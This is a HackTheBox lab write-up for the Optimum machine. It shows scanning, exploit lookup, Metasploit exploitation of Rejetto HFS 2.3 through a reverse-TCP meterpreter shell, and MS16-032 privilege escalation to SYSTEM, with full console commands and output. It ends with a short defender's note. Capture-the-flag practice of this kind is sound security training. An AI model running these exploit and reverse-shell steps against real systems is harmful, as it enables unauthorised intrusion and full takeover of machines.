My next HackTheBox machine to play around with is Optimum. It is a Windows system running HTTP File Server and rated easy. As the machine is running a vulnerable version of HFS, we are able to exploit a vulnerability and gain user access to the box. Inorder to get the root flag, we take advantage of a privilege escalation exploit that exists on the system. Once we got system user, it’s basically game over!
Table of Contents
Reconnaissance
Let’s start by scanning the machine for open ports and services.
$ nmap -A -T4 -p- 10.10.10.8We get the below results that indicate HTTP is running on port 80. We also see the version and that we have the HttpFileServer (HFS) service running and that the exact version is 2.3. HFS is a free web server specifically designed for publishing and sharing files.
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsEnumeration
Before doing anything, let’s just verify the webpage and see what can be done.
We see that we have a login page. There are also actions that we can perform such as get list, search etc. When we click at the version, we are redirected to the Rejetto website so now we know that the server running is a Rejetto HFS server. I did a quick search for default credentials for this server type but it came out empty as HFS does not come with default credentials.
Let’s quickly search Exploit Database for a vulnerability associated with HFS version 2.3
$ searchsploit hfs
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service) | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure | osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation | osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution | windows/remote/37985.py
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsWe are interested in remote executions that are valid for a windows server. That brings us down to the following vulnerabilities.
$ searchsploit hfs | grep -i remote | grep -i 2.3
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txtExploitation using Metasploit
Let’s go and search for reject in Metasploit. We see an exploit is available for windows.
$ msfconsole
msf6 > search rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command ExecutionLet’s use that exploit, set the necessary options and run it.
msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.10.8
rhosts => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf6 exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcpWhen we run the exploit, we get a session.
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.14.20:4444
[*] Using URL: http://0.0.0.0:8080/GeHwwnMUo10N
[*] Local IP: http://192.168.176.95:8080/GeHwwnMUo10N
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /GeHwwnMUo10N
[*] Sending stage (175174 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.20:4444 -> 10.10.10.8:49198) at 2021-06-27 17:18:25 +0100
[!] Tried to delete %TEMP%\SpVzMpjLl.vbs, unknown result
[*] Server stopped.We can verify the userid. We see that we are logged in as user Kostas.
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > userid
[-] Unknown command: userid.
meterpreter > getuid
Server username: OPTIMUM\kostaswe would need to escalate our privileges ignorer to get system user. We can first try and escalate using meterpreter but that fails.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)Privilege Escalation
With the existing session set to background, we can try and search suggester for possible exploitation modules.
msf6 exploit(windows/http/rejetto_hfs_exec) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit SuggesterThere is only one that exists in this case.
msf6 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > runWe get the following results.
[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 37 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Post module execution completedWhen we try to use the bypassuac exploit, we see that it fails.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > options
Module options (exploit/windows/local/bypassuac_eventvwr):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf6 exploit(windows/local/bypassuac_eventvwr) > set lport 4445
lport => 4445
msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 10.10.14.20:4445
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.Let’s try the second suggestion for exploit/windows/local/ms16_032_secondary_logon_handle_privesc.
msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lport 4446
lport => 4446
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1When we run the exploit, a second session pops up.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 10.10.14.20:4446
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\uoMvZCbhetIu.ps1...
[*] Compressing script contents...
[+] Compressed size: 3600
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2168
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2164
[+] Resuming thread..
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
4snyZmJwCOyeJ8Dr2JMe5wE1xNH1AjiZ
[+] Executed on target machine.
[*] Sending stage (175174 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.20:4446 -> 10.10.10.8:49200) at 2021-06-27 17:33:02 +0100
[+] Deleted C:\Users\kostas\AppData\Local\Temp\uoMvZCbhetIu.ps1We see that we now have system user privileges.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windowsLet’s now drop to the shell.
meterpreter > shell
Process 2076 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
meterpreter > shell
Process 2076 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>User Flag
The user flag is normally located on a desktop of a normal user (C:\Documents and Settings\User\Desktop). Since we are already on the desktop, all we need to do is read the file user.txt.txt using the type command.
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\kostas\Desktop
04/07/2021 04:23 �� <DIR> .
04/07/2021 04:23 �� <DIR> ..
04/07/2021 04:23 �� <DIR> %TEMP%
18/03/2017 03:11 �� 760.320 hfs.exe
18/03/2017 03:13 �� 32 user.txt.txt
2 File(s) 760.352 bytes
3 Dir(s) 31.893.905.408 bytes free
C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39XXXXXXXXXXXXXXXXXef5f73Root Flag
To get the root flag, we need to locate the Administrator’s desktop then read the root.txt file.
C:\Users\kostas\Desktop>cd ../..
cd ../..
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users
18/03/2017 02:57 �� <DIR> .
18/03/2017 02:57 �� <DIR> ..
18/03/2017 02:52 �� <DIR> Administrator
18/03/2017 02:57 �� <DIR> kostas
04/07/2021 04:17 �� <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 31.893.905.408 bytes free
C:\Users>cd Administrator/Desktop
cd Administrator/Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\Administrator\Desktop
18/03/2017 03:14 �� <DIR> .
18/03/2017 03:14 �� <DIR> ..
18/03/2017 03:14 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 31.893.905.408 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
51ed1b3XXXXXXXXXXXXXXX2b3eeedDefender’s Note
- We were able to gain access to the system using two vulnerabilities. Had they been patched in a timely manner, it would have taken us a little more effort.
- Opt for secure protocols to transfer files.
CyberSecFaith 